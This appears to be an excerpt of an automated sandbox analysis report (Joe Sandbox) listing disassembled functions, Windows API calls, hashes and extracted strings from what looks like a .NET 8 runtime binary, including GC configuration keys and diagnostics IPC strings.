API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: 313bc4fd77d0e79612d70e7df9918bb3f5b1cdda13cb4ffa40ff8dde6ea41b87
Instruction ID: 8e451e5217233f522a1834a12b1c3ff94003e9d74f6c871fc672433509b0c171
Opcode Fuzzy Hash: 313bc4fd77d0e79612d70e7df9918bb3f5b1cdda13cb4ffa40ff8dde6ea41b87
Instruction Fuzzy Hash: 42217C71A006059FDB20CF5DC885B9AFBB4FF49720F14825AEC1897391D7759D45CBA0

Function 0073DF20 Relevance: 1.3, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?,00000000,BBFE6088,?,?,?,00000000,?), ref: 0073DFA1

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: 6fa9cb7ceea031d81fccf7f57aa49936c5fe152b5eddc5e07b04589ae5e3df69
Instruction ID: 4b152fdcebda7c7a583d1d65b1289d32ec37e3b28e11d192e8429d5c880b758e
Opcode Fuzzy Hash: 6fa9cb7ceea031d81fccf7f57aa49936c5fe152b5eddc5e07b04589ae5e3df69
Instruction Fuzzy Hash: F0315C72A04709DFD710CF59D880B9AFBB4FB49724F10816EE829A7791D736A901CB90

Function 008A8B10 Relevance: 1.3, APIs: 1, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,00000018,0000000C,BBFE6088,00000000,00000000,?,?,00000000,00C35AB0,000000FF,?,00000000,00733EAA,00000000), ref: 008A8BB5

Part of subcall function 008A8A20: RtlFreeHeap.NTDLL(00000000,?,00000000,0000000C,?,?,008A8B78,0000000C,BBFE6088,00000000,00000000,?,?,00000000,00C35AB0,000000FF), ref: 008A8A47

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3ad34ccac96093e5162aa8fd5313535bcd82d06990e429721aead0730f0796a7
Instruction ID: dd0fadf37b6eec0febbb35d2e2af16fd803177eb79a9914fc44d2dd87abb82d1
Opcode Fuzzy Hash: 3ad34ccac96093e5162aa8fd5313535bcd82d06990e429721aead0730f0796a7
Instruction Fuzzy Hash: 03213CB1A00615DFD710CF58D884B5AFBE8FB49720F04456AE915D7B51DB74B800CBB1

Function 00B76680 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00DB6060,BBFE6088,00000000), ref: 00B766D0

Part of subcall function 00B75C70: GetSystemInfo.KERNELBASE(00DAB198,BBFE6088,00000000,?,00000000), ref: 00B75CFC
Part of subcall function 00B75C70: SetConsoleCtrlHandler.KERNEL32(00B75B20,00000001,?,00000000), ref: 00B75D1D
Part of subcall function 00B75C70: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 00B75D28
Part of subcall function 00B75C70: GetProcAddress.KERNEL32(00000000,InitializeContext2), ref: 00B75D34
Part of subcall function 00B75C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,00000000), ref: 00B75D44
Part of subcall function 00B75C70: GetProcAddress.KERNEL32(00000000,RtlRestoreContext), ref: 00B75D56
Part of subcall function 00B75C70: InitializeCriticalSection.KERNEL32(00DAAF00,?,00000000), ref: 00B75DA4
Part of subcall function 00B75C70: InitializeCriticalSection.KERNEL32(00DAAF24,?,00000000), ref: 00B75DD5
Part of subcall function 00B75C70: InitializeCriticalSection.KERNEL32(00DAABD0,?,00000000), ref: 00B75E06
Part of subcall function 00B75C70: InitializeCriticalSection.KERNEL32(00DAB0C8,?,00000000), ref: 00B75E39

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalInitializeSection$AddressHandleModuleProc$ConsoleCtrlHandlerInfoSystem
String ID:
API String ID: 722453380-0
Opcode ID: 8b5fb78af4c516f6d299dd96e738ef8cb667ba1b400db3ab70b211388364ad95
Instruction ID: 0afeaabc94c8fe5134e4708d3ed900a10fc6ff610fa44d70eede3eaa3f10cdce
Opcode Fuzzy Hash: 8b5fb78af4c516f6d299dd96e738ef8cb667ba1b400db3ab70b211388364ad95
Instruction Fuzzy Hash: 66018CB1904308EFD711DFA9ED86B9ABBF8F705724F20422AE419D33A0C77855088B74

Function 039C32A8 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708817791.00000000039C3000.00000020.00001000.00040000.00000000.sdmp, Offset: 039C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_39c3000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 804df976d8f3fef6448a70500e25c15a2996958ca7086190a9fc632f70fad943
Instruction ID: 7baf1f3c323e678f306ee71a17afd374bdfc82a07819d3abb3e859f9e9d790fd
Opcode Fuzzy Hash: 804df976d8f3fef6448a70500e25c15a2996958ca7086190a9fc632f70fad943
Instruction Fuzzy Hash: BBB02B3C10834911C515505D5491725368C47C132DFB480ACB80440043C589C4C840D1

Function 039C32B2 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1708817791.00000000039C3000.00000020.00001000.00040000.00000000.sdmp, Offset: 039C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_39c3000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cc67f5e61e35da0de19adbe402ada90bb640dd1e5e0f2b6dfcbc24405d920b3
Instruction ID: d76c55979caa1886886f93cb5cdc6e1b03b3b0b5c188e7895c41f5593b3c8dad
Opcode Fuzzy Hash: 5cc67f5e61e35da0de19adbe402ada90bb640dd1e5e0f2b6dfcbc24405d920b3
Instruction Fuzzy Hash: D7A0027A14830C26540171EB795383B775DD4C1B75F708866F90C455022856A55914FA

Non-executed Functions

Function 009210C0 Relevance: 109.3, Strings: 87, Instructions: 518COMMON

Download Yara Rule

Strings

System.GC.HeapHardLimitPOH, xrefs: 0092193E
BGCFLTuningEnabled, xrefs: 00921612
GCRegionSize, xrefs: 009215C4
GCWriteBarrier, xrefs: 00921A49
BGCFLkp, xrefs: 009216D5
gcConservative, xrefs: 00921108
System.GC.HeapHardLimitLOH, xrefs: 00921914
GCHeapAffinitizeMask, xrefs: 00921435
GCProvModeStress, xrefs: 00921486
BGCFLEnableKi, xrefs: 0092180D
BGCMemGoalSlack, xrefs: 00921660
System.GC.HeapHardLimitSOH, xrefs: 009218EA
GCCpuGroup, xrefs: 009211F9
GCLowSkipRatio, xrefs: 009214FB
BGCSpin, xrefs: 009212CD
System.GC.HighMemoryPercent, xrefs: 0092144F
System.GC.HeapHardLimitLOHPercent, xrefs: 00921992
GCHeapHardLimitPOH, xrefs: 0092194E
BGCFLEnableSmooth, xrefs: 0092185B
GCLogFileSize, xrefs: 009213EE
gcConcurrent, xrefs: 009210EB
GCMaxHeapCount, xrefs: 00921321
BGCG2RatioStep, xrefs: 009218D0
GCLOHThreshold, xrefs: 0092127F
gcServer, xrefs: 009210D0
GCGen1MaxBudget, xrefs: 009214D4
GCHeapHardLimitLOH, xrefs: 00921924
GCCompactRatio, xrefs: 0092140B
GCHeapCount, xrefs: 009212F7
GCNumaAware, xrefs: 009211D9
System.GC.DynamicAdaptationMode, xrefs: 00921A85
BGCFLki, xrefs: 009216FC
GCLOHCompact, xrefs: 00921262
System.GC.CpuGroup, xrefs: 009211EF
BGCFLkd, xrefs: 00921723
GCHeapHardLimitSOHPercent, xrefs: 00921978
GCLatencyLevel, xrefs: 009213BD
GCgen0size, xrefs: 00921348
gcForceCompact, xrefs: 00921125
HeapVerify, xrefs: 00921236
System.GC.RetainVM, xrefs: 0092113B
System.GC.HeapAffinitizeMask, xrefs: 00921425
BGCFLff, xrefs: 0092174A
GCLargePages, xrefs: 00921219
GCLogEnabled, xrefs: 0092119F
GCConfigLogEnabled, xrefs: 009211BC
GCNoAffinitize, xrefs: 00921182
System.GC.HeapHardLimit, xrefs: 00921515
System.GC.LargePages, xrefs: 0092120F
BGCFLEnableTBH, xrefs: 00921882
GCTotalPhysicalMemory, xrefs: 00921576
GCRetainVM, xrefs: 00921145
GCLatencyMode, xrefs: 00921396
GCHeapHardLimitLOHPercent, xrefs: 009219A2
BGCFLEnableKd, xrefs: 00921834
System.GC.Concurrent, xrefs: 009210E1
GCGen0MaxBudget, xrefs: 009214AD
BGCFLSmoothFactor, xrefs: 00921771
BGCFLGradualD, xrefs: 00921798
GCHighMemPercent, xrefs: 0092145F
System.GC.Server, xrefs: 009210CB
System.GC.HeapHardLimitPercent, xrefs: 0092153F
BGCMLkp, xrefs: 009217BF
GCRegionRange, xrefs: 0092159D
System.GC.HeapCount, xrefs: 009212E7
BGCFLSweepGoalLOH, xrefs: 009216AE
GCSpinCountUnit, xrefs: 00921A6B
GCHeapHardLimitPOHPercent, xrefs: 009219CC
System.GC.ConserveMemory, xrefs: 00921A0D
System.GC.MaxHeapCount, xrefs: 00921311
GCEnableSpecialRegions, xrefs: 009215EB
BGCFLSweepGoal, xrefs: 00921687
System.GC.HeapHardLimitSOHPercent, xrefs: 00921968
BGCFLEnableFF, xrefs: 009218A9
GCBreakOnOOM, xrefs: 00921162
System.GC.NoAffinitize, xrefs: 00921178
System.GC.HeapHardLimitPOHPercent, xrefs: 009219BC
GCSegmentSize, xrefs: 0092136F
BGCMemGoal, xrefs: 00921639
BGCMLki, xrefs: 009217E6
GCHeapHardLimit, xrefs: 00921525
GCConserveMemory, xrefs: 00921A1D
GCDynamicAdaptationMode, xrefs: 00921A95
BGCSpinCount, xrefs: 009212A6
GCHeapHardLimitPercent, xrefs: 0092154F
GCHeapHardLimitSOH, xrefs: 009218FA
GCEnabledInstructionSets, xrefs: 009219F3

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: strcmp$ByteCharMultiWide$FreeHeap_errno$_wcstoui64
String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
API String ID: 2860243993-1294421646
Opcode ID: 8a089bfa8caf2199926cf0282a8c75ec77ed5ca4e9fd9856052afee6fc79dc47
Instruction ID: 1e55e30d7b35c9d05f1be62711f4ff8df8ba00171f43e9eabbbd19e1def9ae76
Opcode Fuzzy Hash: 8a089bfa8caf2199926cf0282a8c75ec77ed5ca4e9fd9856052afee6fc79dc47
Instruction Fuzzy Hash: 5832F674E05344AF8308DF6DBC52526BBA3E7CB320758812BB115CB3A2DB7499478BB5

Function 007B66F0 Relevance: 60.2, APIs: 25, Strings: 9, Instructions: 708memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 009747A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(BBFE6088,?,00000000,00004000), ref: 0097480E
Part of subcall function 009747A0: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 00974822
Part of subcall function 009747A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0097482E
Part of subcall function 009747A0: HeapFree.KERNEL32(00000000,00000000), ref: 00974852

Part of subcall function 009747A0: HeapFree.KERNEL32(00000000,00000000,BBFE6088,?,00000000,00004000), ref: 0097488F

Part of subcall function 00974900: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00C7A98C,?,0088D4DA), ref: 00974950

_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00D0348C,BBFE6088,00000000,00000000,?,C0000000,00C2561D,000000FF), ref: 007B67D1
fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00004000,00000000,000000FF), ref: 007B681F
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 007B7360

Part of subcall function 007BBD40: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,000000FF,?,00000000,007B6848,?,007B6848,?,*** START PGO Data, max index = %u ***,?), ref: 007BBD62

fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00004000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00710000), ref: 007B6861
fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00004000,00000000), ref: 007B72F6

Part of subcall function 007B6670: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,000000FF,00000000,00000000), ref: 007B6693
Part of subcall function 007B6670: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 007B66A7
Part of subcall function 007B6670: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,000000FF,00000000), ref: 007B66CB

HeapFree.KERNEL32(00000000,?), ref: 007B69C6
fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00004000,00000000), ref: 007B6A3F
HeapFree.KERNEL32(00000000,?), ref: 007B6BF3
HeapFree.KERNEL32(00000000,?), ref: 007B6C21
HeapFree.KERNEL32(00000000,?), ref: 007B6CB2
fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00004000,?,?), ref: 007B6B6C

Part of subcall function 0096F3E0: GetProcessHeap.KERNEL32(00000002,0071FF2B,00000002,?,00000002,0071F295,80131623,?,?,00000002), ref: 0096F3EC
Part of subcall function 0096F3E0: HeapAlloc.KERNEL32(03400000,00000000,?,00000002,0071FF2B,00000002,?,00000002,0071F295,80131623,?,?), ref: 0096F408

HeapFree.KERNEL32(00000000,?), ref: 007B6D7E
HeapFree.KERNEL32(00000000,?), ref: 007B6E73
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TypeHandle: ,0000000C), ref: 007B6F08
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 007B6F20
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NULL), ref: 007B6F63
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,UNKNOWN), ref: 007B6F7C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 007B6F8F

Part of subcall function 0071E0B0: HeapFree.KERNEL32(00000000,?,?,?,?,?,0071E15A,?,?,00000004,00000000,00710000,00000001,?,?,00986661), ref: 0071E0F8

HeapFree.KERNEL32(00000000,?,?), ref: 007B7329
HeapFree.KERNEL32(00000000,?,?), ref: 007B734F
HeapFree.KERNEL32(00000000,?,BBFE6088,00000000,00000000,?,C0000000,00C2561D,000000FF), ref: 007B7396

Strings

NULL, xrefs: 007B6F5D
%u %u, xrefs: 007B6DFE
UNKNOWN, xrefs: 007B6F76
@@@ codehash 0x%08X methodhash 0x%08X ilSize 0x%08X records 0x%08X, xrefs: 007B68C3
%u, xrefs: 007B6C39
Schema InstrumentationKind %u ILOffset %u Count %u Other %u, xrefs: 007B6A72
None, xrefs: 007B6B94
TypeHandle: , xrefs: 007B6F02
*** START PGO Data, max index = %u ***, xrefs: 007B683D

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$Free$fgets$_errnostrcmpstrlen$AllocProcess__stdio_common_vsscanf_wfopenfclosemallocstrncmpwcstoul
String ID: %u$%u %u$*** START PGO Data, max index = %u ***$@@@ codehash 0x%08X methodhash 0x%08X ilSize 0x%08X records 0x%08X$NULL$None$Schema InstrumentationKind %u ILOffset %u Count %u Other %u$TypeHandle: $UNKNOWN
API String ID: 169502912-2398891802
Opcode ID: 7388218a07670aa7c0f54bd903b056f743f6b509b99b8ff5cbca2e755472052d
Instruction ID: 2d7e32219cd2cffba7fd669de6091390ab6af69966cc01c71982b23ef6ad4d82
Opcode Fuzzy Hash: 7388218a07670aa7c0f54bd903b056f743f6b509b99b8ff5cbca2e755472052d
Instruction Fuzzy Hash: 826257F1E052288BDB24DF24DD44BDDB7B4AB84301F5441D9EA09A7291E778AF84CF58

Function 00832250 Relevance: 45.8, APIs: 16, Strings: 10, Instructions: 327stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(HeapVerify,GCLOHThreshold,00000000,00000000,00710000), ref: 00832273
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(HeapVerify,GCHeapHardLimit), ref: 008322C9

Strings

GCHeapHardLimitLOHPercent, xrefs: 00832473
GCHeapHardLimitPOHPercent, xrefs: 008324BB
GCLOHThreshold, xrefs: 0083226D
GCHeapHardLimitSOHPercent, xrefs: 0083242B
GCHeapHardLimitLOH, xrefs: 0083239B
GCHeapHardLimit, xrefs: 008322C3
HeapVerify, xrefs: 00832272, 008322C8, 00832310, 00832358, 008323A0, 008323E8, 00832430, 00832478, 008324C0, 00832501
GCHeapHardLimitPercent, xrefs: 0083230B
GCHeapHardLimitSOH, xrefs: 00832353
GCHeapHardLimitPOH, xrefs: 008323E3

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: strcmp
String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCLOHThreshold$HeapVerify
API String ID: 1004003707-1810996416
Opcode ID: 4ddcd4276ab0476b12705c22d57843c1c44e5c3533ae9c665735964451d9a8f4
Instruction ID: 339eb97ac9276123011c2753efa36ad4799ce2852eb27dc17f2609f3761fd852
Opcode Fuzzy Hash: 4ddcd4276ab0476b12705c22d57843c1c44e5c3533ae9c665735964451d9a8f4
Instruction Fuzzy Hash: A4B1C3716003049BCB20CF19FC85BADB7F4FB96321F50026AE91AC73A2DB71A955CB65

Function 00A34D80 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00A310F0: GetCommandLineW.KERNEL32(00000000,00000000,?,?,?,00A34810,?,00000000), ref: 00A31107
Part of subcall function 00A310F0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 00A3117F
Part of subcall function 00A310F0: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A35556), ref: 00A311A2

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 00A34DBD
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A3587F), ref: 00A34DCD
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00A34DE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00A3587F), ref: 00A34DF8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00A3587F), ref: 00A34E55
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A3587F), ref: 00A34E63
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A3587F), ref: 00A34E71
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00A3587F), ref: 00A34E82
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00A3587F), ref: 00A34E93
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00A3587F), ref: 00A34EA4
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 00A34EDE
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00A3587F), ref: 00A34EF5
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 00A34F18
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00A3587F), ref: 00A34F23
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00A3587F), ref: 00A34F90

Strings

Failed to send DiagnosticsIPC response, xrefs: 00A34E3A
win-x86, xrefs: 00A34F7B
Windows, xrefs: 00A34ED3, 00A34F0C
DOTNET_IPC_V1, xrefs: 00A350BF
8.0.0, xrefs: 00A34F66
x86, xrefs: 00A34F3A

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

